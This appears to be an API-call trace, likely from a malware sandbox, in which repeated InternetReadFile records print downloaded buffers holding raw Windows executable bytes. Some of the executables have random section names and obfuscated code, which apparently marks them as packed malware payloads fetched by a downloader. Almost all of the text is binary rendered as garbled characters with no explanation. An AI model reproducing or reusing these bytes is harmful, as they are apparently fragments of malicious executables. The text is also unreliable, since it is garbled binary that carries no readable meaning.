          MZÿÿ¸@º´	Í!¸LÍ!This program cannot be run in DOS mode.

$CÔë캸캸캸L”¹¹
캸L”¿¹Æ캸L”½¹캸HG¸캸H¾¹캸H¹¹캸H¿¹R캸L”¾¹캸L”¼¹캸L”»¹캸컸íº¸Ì³¹캸̐E¸캸ì-¸캸̐¸¹캸Rich캸PEL·¹°eà"šjN°@0N@€PDœ@ø=PDh[8 *@àp°.@à@ L@àP`T@à°V@à.rsrc@@>V@àÐ/€”@à.dataà	PDØ	”@à¬Æ*ièP©8^Gj]
½°´ÝЈLê°&2‘a֙Zy|aëÕv(¦wrÊçΖìC‘ÓxhpLržd
“ñ¤_Ç ½2“±^¸“w¬7Süä¡HñÞz8¢ú1д¥Ãê”»ê$r®}uºÓÉzpyˆ=î¦.õ,‡b’}Ò¦½
ÊWqOݟ‹¤Q%cߣóü¡ÊŒ±úڅ˜Ú_©Þœ¬Ùí)Çyᙶiá8+D‡lÁšK}
’\€fŠø+äZ:{‡(ì’E”ÁzUvÝ^°ÁYÒ»ZƒË‚U?ÆžÐi¦L|mAV\X=,V
ñDß°ú¦r
‰†€<û0±xϾ’¡OŸŽ_Û<W?„;!Àäœçgï"yI¬¿£Cã·üõsM:'õ®T	nž.‘Ò~ä$
 îS6qclúhëØÿˆö0¯
HòŽhœLÝ\¨ç ¸´¨ô2ɉˆÅ¶º¾I@gZc]fTùvV¤×Yó`lUfÖ" ‘¢×Qý*þžGR[Çb@o>\ٙ@O‘=Ç¢-JN~Ý&¶Ì:ý±9Ë%Iég&À¦»?ðŒ¸ÐLjx¾ÁƱ‚I &¨±„F‰RØÿþFOÚu…<m
UX»+Ÿ
j,kš¯ß$A£	‚½?Þs%G¢]hÞ|S¡y¸Œû¡e‚n/$3»¢õ²×òˆ’+`D]­p$X$ÒOª”„ešø¬…НðéYöµÍ#‚‚$$æ9
–Á$ڀ<à«os»µÓR¹ÔmaxË]úG–ï°€ý7ìTÆû‹b4DHkÿÂÃY;—Þ—ùXóçNYÂA«ÿ:­·ók2Òâ90šþ­Ãóþ #}ò4œn£?H̱F:˜Ël½í%ì²ï¶prš„å°aZÝËärýs1àÓ2|_â#Jéa8¨³Ø·ÈzÕfj]ÁútPûVæÚqà`Þ§Õ×¼mq˜Í× æ-BVÀâµ|
}ÿƀ©!58Ƥád{ø¬ø濹§Ö¨Ð4/ï¦tù$¼4ðóûÛv°"Í9¿¡GQõ~}¯íƒv˜øß ¢›tÂÞHØäJDfB¤î„·duûbD”@ÞÊJä€ÑêÑÁÐD=×næUÓÀÓ£:d¶_ñm£ê¬LäЮ(º¬G¨(}Ã@œ‚7êü&7ƒYÒzÀ¡Ëç­i¾>ê?ùLÝ%!šUÇDà«PõÅSB¶¦q€¤ǽÖuÝiý'¹À¾L',ÅÉÆ §¨›;žYfÖ,åðàÏ­úè}I©SÝrÊEM÷¼‡Òlv
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc000c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@ º´	Í!¸LÍ!This program cannot be run in DOS mode.

$šÇƒ®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýߦíýŒÎèüó¦íýŒÎéü̦íýŒÎîü˦íý×Þnýצíý×Þ~ýû¦íýÞ¦ìý÷¤íý{ÏãüŽ¦íý{Ïîüߦíý{ÏýߦíýÞ¦zýߦíý{ÏïüߦíýRichÞ¦íýPEL²eà"¬	JwÀ	@Pc‘@€@@dŽ|@
àÐ
”uð4@À	”.text«	¬	 `.rdata‚ûÀ	ü°	@@.datalpÀH¬@À.rsrcà@
ô@@.reloc”uÐ
v„
@B¹t
Mè8ýhé#DèðYÃhó#DèƒðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYá0MQ‹@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè
ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYù%M蝘h?$DèÕïYÃV‹ñN贇N謇j(VèâìYY‹Æ^ÂU‹ìƒì8Ç0MtÉI3ÒÇœM0ÉI‰ M‰¤MVQf‰¨Mèo¡0M‹@ǀ0M\ÉI¡0M‹H”ûÿÿ‰,M3À¹¸M£ÌM£ÐM£ÔMèY
¹èMè헹øMè㗹Mèٗ3À¹„M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xM蛗3ÀǬM<ÉI¹M£”M£˜Mf£œM£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèϖ¹(Mè€ÇM<ÉI3Ò¹M‰M‰M‰M膹@M蓖3À¹„MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0M‹HÁ4M薍Mè胼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£€Mf£lM¢”M¢}M£\MÿhÂI‹ð…ö…3҉|MèÂRÿhÈI¸0M^É¡0M¹@MV‹@ǀ0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨M‹Î腕h ÉI‹ÎèoW¸0M^ÂV‹ñNèe•Nè
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc000c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@º´	Í!¸LÍ!This program cannot be run in DOS mode.

$CÔë캸캸캸L”¹¹
캸L”¿¹Æ캸L”½¹캸HG¸캸H¾¹캸H¹¹캸H¿¹R캸L”¾¹캸L”¼¹캸L”»¹캸컸íº¸Ì³¹캸̐E¸캸ì-¸캸̐¸¹캸Rich캸PEL·¹°eà"šjÄN°@0N@€PDœ@ø=PDh[8 *@àp°.@à@ L@àP`T@à°V@à.rsrc@@>V@àÐ/€”@à.dataà	PDÚ	”@ଋû”£]­f?”¦9Ùíg‡šU7ߛùGظ2³Ux?È1Š•¡ü(««³ÝÏ$	oK=VÄÒ?ñYàCZ«T •=—
Ê1HH¼I	x¥
%¬VŠl–8óՔ$…
)w—§˜vŽÄ~ùÝÄ·D•Î$—4«½¡B¡€zº	óøÞ:£árNJõÔ$¢µwHõݜÄV&¸Ý¨Í}ˆ)$tÙ×V¹ÚEÓ%mCy<X¯‘µƒ¸Þ¦üÐ÷¦ïx%ÀCö:S”xÌDœÕ¨õåˆ}hmœDG·þ5𣤖$ä2«V6š¡#M­¶Ù†ëO½µÊ-lü kè½Ú©\²qÖÈC±Un¹·ìù±,Җ*^Ê*Üb˦	‡#þóë6ã_‹îÂ5¹aÎÐb7«–³•ë£ª'#+–Õ6;Š¶µS¶¤w}Fkã7Ú><ô¿=)tƒ‰çûñÑ
±`%Ζ„2‡äõ-X¾_n–`*Tãùâm(;{©±û—?a>m]‰Ï9pùƒ¹BèQñª€šZ»ÝHžž	ºûo®WDéׁÂHòß]ÔNæGʁ±òJÕVϖ°¥šë)
û~ãÏÃ?øª36”®½Ç¡âö EÚæÎI/¯¢·>èÕ
—Q.z3EAV¾E¯•"ËgqZ!øÃÛ»öt%<IeÓ¸}9æuíãAöÂç}§Bq¢þ”XÝ1ᇯÀ¦–ÑP/Ç÷	*¯Ži,m;„éé«ñÿfm68@‡ÎæªËv’XøÿrÑ¢Ûڛ•2µ¶Þ^‰4Ó5~
Ì *žyÉßâǂÞ)*
ÐYýü·T@1Í3ÆÝl‘;ó°Y\ac$Íihõš“í}õÎSÒ,«¢¬0•2ó,™&›…ü9&È«Â
Z™M½Î‘ÆÕjºˆ&lï¯Þ_ùwljX44’×i7ˆ‚RYäa1¹‰drÿ¡TÑϗ;^†º¢ÎcÓû-΅Ï§;rèþðÊå̸@EÌ-¿qvÓ(ÍjඝC'õÑO-Î|	âhQw8¥Ï‰ž§<h@Q/(Ôû¡‡À®p¡~n g}p‚Ò”	¦QEg=P‘¿‘ÝB#!¸øaøûæà 'Kz²6ė‹ïZ(&‘v;ѵbw$zO©†}9„z(_¡97pŸK=±ñ”àZB:Dp"†É閔ˆ@&ü±Áo†-ªYV™;i4û¸…ä|ÏóJ´K»Í¤ÿu…íú?ãœ{­—ëëµÝcë9ؙJHÏ)¶Ïœ6úy)*ÓèÑFºëú¦Ù§Ðš¡ÍÖì;Zæ=w‡Äœñ%{(MA”Köân½C²õŠ.bP2ÚáÅ/bÀæÉð–§lÑåûý1°†=Ô§r^™M÷0=×õvÓÁž™1u&Ÿnþ!ËMž‡¬H0aن¾Ž8I³ù-™_ò¸Wcc9„N.8
׺…ÐyÑ°CDàÔ¼H†’C˜Ìwœx…Ü>„]aiÇ«ÜÚ ;ïaØJåY’¾SQÂ2Þÿk#Ì×{bý­®«¬U9G?î+î`©0åNÿ¦ËVÙÿÞð/ÙÎSMF½€¿o®¸®É–‰uVßò
ˌ:ÿˆýµì”œó§¶¹²¹˜Þ÷àsÏ7ä| |´a"P&ÝëìÕ»úA‡…ÕàÇ'6¸µLCJM¿^Ò:öT!æÐ37ÒôŠ§?‘Oòw¾’7íoî›mOëy«´¨õ´<
Å4>p*I«¾z†Qôp@Ês¼‚Žì…}ZB9´téÃÛ¬£Ÿuzv)5/0Mt}÷¢8p>wýŒÐ¶Æ´ÐŒUØړ»æð¼‡Oï$8]åÆÜÈ<hjR~Oe»…|›|®s±³Î:N»qºÞJ—K+™Ønß±\>
ÔöÀ>ðIz+ÅNÇ((袪¼åãÇBà+B41¢„×R]†i¨ä•ýg'ð‹&ÿ1ça5Qo‚R<[ êñS'»}µnvOf΃3˜õ<™ÒÜO㺗ãä_ðj¢0IáÄ0E¾•TžÓiñE‹ÓJ&fWœÐ/䜀ƒ»FçÈ}î5Ós1
ƒ[rø[„ƒß+åÆè$í¿²¢ØӍˆ U|¿]»§—éŸúI·Îìv€?A¼ÈåºuY,V€jMJèå^»$
®Õ•“Ý07 ®ªi8­©Ô¹FXm¤{÷ÂGaÃÚïµUCí”~(«°yeüԀm‹µªÍaŒ÷ЃŸoÞiuý‘¬/Jzuâ[pêB2‘¾8Õ±ñ+Ó
;YŸ¡ž®U–VP™—xEqÉઽ\…×l/*3–ÞGV™ê(ÞÅgL¯`‡•d:\Eön‘ðMib¹‘é{Ùf¾)ã§¨)Š7qbÛ<¡Ń+qzãIt¨2…ÆùÐåÚØCs'CØþØÔ®65|(dc±éGx‡&õ±¢]þ4BÙb#KL—8Ø_¼%4Á­N&kT´#_tÒ-sì[¬B¡Áé
SdU¦éN”¬%IŠ{•öÞê=ì#ZaèŠä~?ð³nõYˆ¦ÏÜÀ˜2¸¿8wÏm.U#ò­=ý/O](˜A=,¬JŠe‹Q|¡È˜¤«ÛvÙJÓÕÙj²Ä$±%OÀÙ¶*~B3$ëÊLÏ8qMx»
ƒe¬™UŸA7W<Ìu‘z\'ðÕ¶?x¾iÆãàEdª_•Œa‘…ÐZ|õ,~¾zJ¥ô5vÎDË¢¶+5ź:päé8«/•´tˆÅ#íb@Šêc¶E0¸Ò‹ÃéMb	Éé4éÈÁyÎ5š¶WÚ‚/Œ¯£c@¾…Mm6äU¶ËU' “¦åڄ]ßOfÐÙí€F5‹¡Ýb3xó³ã€q	îÔÖNÖ£0ø¿á¤7Uš™9ff]#ZyQRóÓb#³hm€Bø×%ª®¤Ú˜
°7bymàƒ™-•4ˆFqvqêa-ã6¨’›õã^Ôv@1³ñL÷$¡Pp‹Õ;`äzE9¾,YÎdÞUh:=¥{;*v‹ù†ÖDm)&5ÂY¨EÎ†F°*¡­¬Ëˆ–Þ¥h¡ úWkB<>¾ó#…¢*ÍW饴ÆL¶{GAê/^SP[nîRE¥iegdä†Q
Ì®ÚÉâÚ¿Jó(Ä($”!<%G8DÃcY׏&Kòé¤Ðcgq˜ ¨˜–586»hœÎ„¨sÙ8è"φõ<¯g… µF#Ë(D¢ŽR3×|ÓévÒñ¡ÇÔÀ·Àyñ°¡ÛKî ëXíÙ±‰†§èv°ª
»GwÍxmŠïs§8ŦwN_œú‘_íT@xu€ÔKVÄjºøØ~îâ'Oú˜ÍX¯vï}Í3ÓÙ×0kF:ÀhËÆJØγìuÍTÂ/ Ý‹È{d8ðI,|Þ"V‹Of¹ì».ýPÛ®z½f®èÒÿ°“¾ÇÉ;é¸þÒ)‚L¦¦w^Ul£‰ˆA~b¶e¹Ú
&˜Ei͈¯]þѧyúy}<ýø¢iéò1-ºhJÒ7	“mמ·iÛy'Mݑdx‡5Go ¡££:#µídL”§6*_,iºòøÙÇK¯Z˓ É »Î‘‰oaAÈ=¤!,˜¾©Øª•SvþÁ+b_.ÒY^¾¦×š8Œi·‡UÐjNÕî™Ð¾‘qcëÁ¾bV²ÍtÙ,ô	73¾MŠ(O­ç,¹ÂhŹÎèÌx]·ýN‡bZÄÚ­»owaÂP‹.)øüв{>yÇ&'MÐ:ΙÑ¥PG¢Œ ¿åí~’U\ó xѝ‰^Ìò`8¨)eõÈ]žó8ÒJQӞä4oèÎ+*N•ÞN´Fáìڋ~^ËOif „ý×$9õ"×geqÙ 7¹‘
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc000c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZx@xº´	Í!¸LÍ!This program cannot be run in DOS mode.$PEd†¦S}eð"hn°£@У¡·f`€ÐnµÀnX À£Œtn ) ¯£@¯£(       °nàR@à.rsrcXÀnðR@À.idata  ÐnôR@À        @!ànöR@àxgrhcaku øR@àcnnrpfsb°£ˆf@à.pdataIÀ£Šf@@
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc000c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@º´	Í!¸LÍ!This program cannot be run in DOS mode.

$'ö³c—jàc—jàc—jà8ÿiái—jà8ÿoáë—jà8ÿnáq—jà¶únál—jà¶úiár—jà¶úoáB—jà8ÿkád—jàc—kà—jàøùcá`—jàøùjáb—jàøù•àb—jàøùháb—jàRichc—jàPELh֖eà!’!g à@ zœ<{P°øÀ°o8èo@ H.textV `.rdata b d@@.datav@À.rsrcø°‚@@.relocÀ„@Bj hèl¹p˜èßHhè­SYÃÌÌÌj hm¹ˆ˜è¿Hh`èSYÃÌÌÌjh0m¹ ˜èŸHhÀèmSYÃÌÌÌjhHm¹¸˜èHh èMSYÃÌÌÌjham¹Ð˜è_Hh€è-SYÃÌÌÌjham¹è˜è?Hhàè
SYÃÌÌÌjham¹™èHh@èíRYÃÌÌÌjham¹™èÿGh èÍRYÃÌÌÌhè¾RYÃÌÌÌÌh`è®RYÃÌÌÌÌhÀèžRYÃÌÌÌÌj?hèm¹x™è¯Gh è}RYÃÌÌÌhènRYÃÌÌÌÌh è^RYÃÌÌÌÌh@èNRYÃÌÌÌÌhàè>RYÃÌÌÌÌh€è.RYÃÌÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPèb[ƒÄ‹Æ^]ÂÌÌ̋I¸¼l…ÉEÁÃÌÌU‹ìV‹ñFÇÔ!Pè“[ƒÄöEtjVèLNƒÄ‹Æ^]AÇÔ!Pèi[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌU‹ìƒìMôèÒÿÿÿhˆzEôPè;[ÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPè’ZƒÄÇ,"‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPèRZƒÄÇà!‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìì„ƒ}SV‹ÙW‰]à„Ûƒ}0„у}H„Çj/hdmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèŽEjjjjh”mÿ,!ƒ}MjCMjjjjjPQP‰E´ÿ0!ƒ}4M jCM jjjjQh˜mP‰E¸ÿ4!ƒ}LU8ÿuHCU8Mȃ}Ü‹ðRÿuØCMÈQV‰uÀÿ8!EüPhÿ…€ûÿÿPVÿ<!…À„iƒ}ü„\…€ûÿÿÇE”ÇE˜PÆE„fDŠ@„Éuù+M„P…€ûÿÿPè§D‹MüE„9M”ÇE¬BM”ƒ}˜QCE„MœPÇE°ÆEœèvDƒ}°Uœ‹}œ‹MôC׋Eø‹]¬+Á‰MÄSR;Øw,ƒ}øuäCuä‰EôPè«j‹Mč3‹uÀƒÄÆëÆE¼Mäÿu¼Sè™G‹}œ‹E°ƒør+H‹Çùr‹üƒÁ#+ǃÀüƒø‡˜QWèXKƒÄ‹U˜ƒúr,‹M„B‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡dRQè$KƒÄ‹EüƄ€ûÿÿEüPhÿ…€ûÿÿPVÿ<!…À…šþÿÿ‹]àV‹5@!ÿÖÿu¸ÿÖÿu´ÿÖEä‹UܸÆEäó~EôfÖCÇEô‰Eøƒúr/‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡ÌRQèŒJ‹EøƒÄÇEØÇEÜÆEȃør.‹MäP‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡„RQèDJƒÄ‹UÇEôÇEøÆEäƒúr,‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡>RQèþIƒÄ‹U4ÇEÇEÆEƒúr,‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡øRQè¸IƒÄ‹ULÇE0ÇE4ÆE ƒú‚Ç‹M8B‹Áú‚«‹IüƒÂ#+ÁƒÀüƒø‡ªé’jhamÇCÇCÆèÝA‹Uƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwbRQè"IƒÄ‹U4ÇEÇEÆEƒú‚Lÿÿÿ‹M B‹Áú‚0ÿÿÿ‹IüƒÂ#+ÁƒÀüƒøwéÿÿÿRQèÓHƒÄ_^‹Ã[‹å]ÃèðnÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì<¹`™SVW‹=@™3öVham3ÛèA…ÿ„–DCOãÿ€yKËÿÿÿCŠ‹ð¥¶Ñòæÿ€yNÎÿÿÿF¶†ð¥ˆƒð¥ˆŽð¥Mඃð¥‰uø¶ÀjÇEðÇEô¶€ð¥ˆEÿEÿPÆEàè—@Eàº`™PMÈèÆA‹ðƒÄþ`™t|‹
t™ƒùr.¡`™Aùr‹PüƒÁ#+ƒÀüƒø‡Ô‹ÂQPèµGƒÄÇp™Çt™Æ`™`™ó~FfÖp™ÇFÇFÆ‹U܃úr(‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw_RQèBGƒÄ‹UôÇEØÇEÜÆEȃúr(‹MàB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèGƒÄ…ÿt‹uøéoþÿÿ_^[‹å]ÃèmÌÌÌU‹ìƒì<SVW‹ùÇGÇGÆèþÿÿ¡t™¾`™‹`™ƒø»0™Còƒ=D™C0™+މ]øƒø¹`™¡p™CÊÁ;ð„*Š3Mà2ˆEÿEÿjPÇEðÇEôÆEàèÞ>Eà‹×PMÈè@‹ØƒÄ;ûte‹Oƒùr+‹Aùr‹PüƒÁ#+ƒÀüƒø‡Í‹ÂQPè	FƒÄÇGÇGÆó~CfÖGÇCÇCÆ‹U܃úr(‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwiRQè§EƒÄ‹UôÇEØÇEÜÆEȃúr(‹MàB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw'RQèeEƒÄ¡t™F‹`™‹]øé¼þÿÿ‹Ç_^[‹å]ÃènkÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQƒ}4E SCE VWÿu0‰Mü¹H™Pè=ƒ}EÿuCE¹0™Pè„=‹5X™3ۋ=\™fDƒÿˆ›ð¥‹Ã¹H™C
H™™÷þŠ
ˆƒð¤Cû|Ô3ÿ3öŠ–𥶆ð¤ø¶Êùçÿ€yOÏÿÿÿGŠ‡ð¥ˆ†ð¥Fˆ—ð¥þ|Á‹uü‹Îè‡ýÿÿ‹Uƒúr
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc0018
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@€º´	Í!¸LÍ!This program cannot be run in DOS mode.

$PEL”sã‡àPH^\þf^ €^@ b@…°f^K€^XàaGf^  H.textG^ H^ `.rsrcX€^ZJ^@@.relocàa¤a@Bàf^Hàl&„ÏPd<9m#%0>(8(
 :& 8	8ÕÿÿÿþE8*(ÔC*&~þ*~*0@(8(
 :& 8	8ÔÿÿÿþE8*(ÔC*&~þ*~*0Æ þ8þE.dNx8*s
€ 8Åÿÿÿs
€ 8±ÿÿÿs
€ :œÿÿÿ& 8‘ÿÿÿ( :ÿÿÿ&8wÿÿÿs
€ 8gÿÿÿs
€ 9Rÿÿÿ&8Hÿÿÿ0l þ8þEF'8A~o
 (:Îÿÿÿ&8Äÿÿÿ8 (:´ÿÿÿ& 8©ÿÿÿ*0l þ8þE,F8'~o
 (9Îÿÿÿ& 8Ãÿÿÿ8 (9¯ÿÿÿ&8¥ÿÿÿ*0l þ8þE'$88 (9Öÿÿÿ& 8Ëÿÿÿ*~o
 (9¬ÿÿÿ&8¢ÿÿÿ0q þ8þE'8*8øÿÿÿ (:Óÿÿÿ& 8Èÿÿÿ~o 
 (9¬ÿÿÿ& 8¡ÿÿÿ0l þ8þE'8*8øÿÿÿ (:Óÿÿÿ& 8Èÿÿÿ~o!
 (9¬ÿÿÿ&8¢ÿÿÿ(ÔC*&~þ*~*0 þ8þEG-º‹½©X8B~(8
 (B:¹ÿÿÿ& 8®ÿÿÿ8ˆ (B9šÿÿÿ&8ÿÿÿ:
 8ƒÿÿÿ (> (?(@o9
s:
 þ8Lÿÿÿ~ (A:8ÿÿÿ&8.ÿÿÿ€ 8!ÿÿÿ*8Êÿÿÿ (B9
ÿÿÿ&8ÿÿÿ0l þ8þE$'88 (A9Öÿÿÿ& 8Ëÿÿÿ*~ (A9±ÿÿÿ& 8¦ÿÿÿ0F þ8þE8*€ (B9×ÿÿÿ& 8Ìÿÿÿ0œ þ8þEb'8]*8øÿÿÿ (B9Ïÿÿÿ& 8Äÿÿÿ(8 \(>~o;
(2
 (A:”ÿÿÿ& 8‰ÿÿÿt	 8vÿÿÿ0— þ8þEMJ88@ 8×ÿÿÿ(C x(>~o;
(D (A:§ÿÿÿ&8ÿÿÿ*t	 (B9†ÿÿÿ& 8{ÿÿÿ.(E(F*.þ	(ÕC*.þ	(LD*.þ	(#
*&~þ*~*(8*.þ	(2
*(ÔC*(YD*0i þ8þE E8(ÔC :Úÿÿÿ& 8ÏÿÿÿsH(Jt	€ :°ÿÿÿ&8¦ÿÿÿ*09(M8(<
 :&88ÚÿÿÿþE8*0g þ8þE%8*~ (L9Ðÿÿÿ&8Æÿÿÿ8Ûÿÿÿ (K:¶ÿÿÿ& 8«ÿÿÿ.þ	(=
*&~þ*~*(ÔC*0g þ8þEA8<87 (P:Öÿÿÿ&8Ìÿÿÿ(O (Q:¹ÿÿÿ& 8®ÿÿÿ*(I*&~þ*~*0M þ8þE8 (¹9Úÿÿÿ&8Ðÿÿÿ*9š (¸:
&8þE*€=N8%{o>
 (¹:Èÿÿÿ& 8½ÿÿÿ{þ818+:Áÿÿÿ 8™ÿÿÿ8/ (¸:…ÿÿÿ&8{ÿÿÿ (¹9mÿÿÿ&8cÿÿÿÝ<ÿÿÿ(· (¸9& 8þE8Ü (¸:Ëþÿÿ&8ÁþÿÿAÁ60™– þ8þEăØ8Ô`rpž},M_DdF…¥EJ8‡oÜ'×DÔCãAK¹4¥f'd(ðÝtÑ UCZÊ1)*%¡@|?3µ f¬SÍA/pÇMŒNf..I!m›q¬Brb™|¬mÐ&¤^XNh¿ÿÂLm„)CMvt~3ÑfTwO0)sAÅlk™ƒ¨j×|ÐIp=€3\Bk½
1tèkï~Á)’Qƒ‰*SŽhcRÂval€èB~€ƒs‘O,{%ȁ^6ó0™]ox:/À–bÏi´Z€–D"+K7YT‚‘'‘7H)pE+(‚y;$1ym=A
_ƒÆ5Ñ-aÍO?&7„arü„UEÂB\ï*§[vï‚|6D¾>±›?QÓ‰%º
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc000c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@€º´	Í!¸LÍ!This program cannot be run in DOS mode.

$PEd†ð.$(¾2†À@À8ü2` 8N 8Ð`8E
2pep8DGî1(|$8@.text'(```.dataƒ@„,@`À.rdata0, Ð. °@`@.pdatape2fÞ1@0@.xdata8p2D2@0@.bss@…€2€`À.edataN8R2@0@.idataÐ 8T2@0À.CRTp@8h2@@À.tlsP8j2@@À.rsrcE
`8l2@0À.relocDGp8Hz2@0BÃff.„@Hƒì(H‹¥ä11ÉÇH‹¦ä1ÇH‹©ä1ÇH‹lä1ÇH‹ã1f8MZuHcP<HЁ8PEtiH‹2ä1‰
¬o2‹…ÀtF¹èœè'&H‹Ðã1‹‰è&H‹ ã1‹‰èqH‹`â1ƒ8tS1ÀHƒÄ(Ã@¹èVë¸@·PfútEfúu…ƒ¸„†xÿÿÿ‹ø1ɅÒ•Áéfÿÿÿ€H
‘qèLw1ÀHƒÄ(ÃDƒxt†=ÿÿÿD‹€è1ÉE…À•Áé)ÿÿÿfHƒì8H‹Eã1LÖn2H×n2H
Øn2‹‰°n2H©n2H‰D$ H‹Õâ1D‹è­HƒÄ8ÀAUATUWVSHì˜¹
1ÀLD$ L‰ÇóH«H‹=èâ1D‹E…É…œeH‹%0H‹ìá1H‹p1íL‹%Ã8ëDH9Æ„¹èAÿÔH‰èðH±3H…ÀuâH‹5Ãá11틃ø„‹…À„lÇîm2‹ƒø„û…í„H‹á1H‹H…ÀtE1Àº1ÉÿÐè/sH
vÿ&8H‹;á1H
„ýÿÿH‰è,#èqH‹Ðà1H‰ym2èô#1ÉH‹H…ÀuëX„„ÒtEƒát'¹HƒÀ¶€ú ~æA‰ÈAƒð€ú"ADÈëäfD„Òt@¶PHƒÀ„Òt€ú ~ïH‰m2D‹E…Àt¸
öD$\…à‰â,Hc-m2DeMcäIÁäL‰áè0L‹-ñl2H‰Ç…í~B1Û„I‹LÝèÎHpH‰ñèI‰ðH‰ßI‹TÝH‰ÁHƒÃèâH9ÝuÍJD'øHÇH‰=šl2èõmH‹Îß1L‹l2‹
‰l2H‹L‰H‹tl2è_ö‹
Yl2‰Wl2…É„Ù‹Al2…Ò„HÄ˜[^_]A\A]ÃD·D$`éÿÿÿfDH‹5Áß1½‹ƒø…ûýÿÿ¹è狃ø…þÿÿH‹Õß1H‹
¾ß1è™Ç…í…ìýÿÿ1ÀH‡éâýÿÿL‰Áÿ8éVýÿÿfèƒ‹©k2HÄ˜[^_]A\A]ÃDH‹™ß1H‹
‚ß1Çè7é€ýÿÿ‰Áèëf.„Hƒì(H‹Õß1ÇèºüÿÿHƒÄ(ÃHƒì(H‹µß1ÇèšüÿÿHƒÄ(ÃHƒì(èÇH…À”À¶À÷ØHƒÄ(АH
	éÔÿÿÿ@АUH‰åHƒìH‹
IÆH‹:ÆH9È}s2HÁàH‹H‹\H‰ÈHƒÄ]ÃH…Év
H‹H‹ZHƒÄ]Ã1ÀH‰Áèè,ÌÌÌÌÌÌÌÌÌÌ̐¶HƒáHƒùuH‹@@Ã1ÀÃÌÌÌÌÌÌÌÌÌÌUH‰åHƒì¶p@öÆtV¶pƒæHƒÆïHƒþw<H
“ÿ$ñHpHë4Hp@ë.Hp8ë(HpPë"HpXëHp8ëHp8ëHpPfëHp0ë1öH…öt-·Vf…Òu1Ò1öë‹~HþHúwH‰ðH‰ÓH‰ÙHƒÄ]Ã1À1ÛH‰ÙHƒÄ]ûè-ÌÌÌÌÌÌÌÌÌÌÌÌI;fv-UH‰åHƒì¶HƒáHƒùu
H‹@@HƒÄ]ÃèÿÿÿH‰ØHƒÄ]ÃH‰D$èC÷H‹D$ë¼ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUH‰åH…Àt1É1Òë1À]ÃHHH‰ðHIHYH‰ÆH<HH…Û|:¶?A‰øƒçH‰ÈH‰ÙHÓçHƒù@HÛH!ßHúAöÀ€u»Hƒúu	€~_”Áë1ɉÈ]Ãè®5ÌÌÌÌÌÌÌÌÌÌÌÌÌI;f†”UH‰åH…Àt1É1Òë
1À1Û]ÃHKH‰øH4IH4qH‰ÇLM@H…ö|YE¶E‰ÁAƒàH‰ËH‰ñIÓàHƒù@HöI!ðLÂAöÁ€u¹HH@H…Ò|H‰ÁH÷ÙH9ÑrH‰Ó]ÃH…Àtèr“譓èh“è5H‰D$èøõH‹D$éNÿÿÿÌÌÌÌÌÌÌÌÌÌÌÌÌÌI;f†ðUH‰å¶öÂt1É1Òë
1À1Û]ÃHKH‰øH4IH4qH‰ÇLM@H…öŒ«E¶E‰ÁAƒàH‰ËH‰ñIÓàHƒù@HöI!ðLÂAöÁ€u²HÚ1É1ÛëIJH4
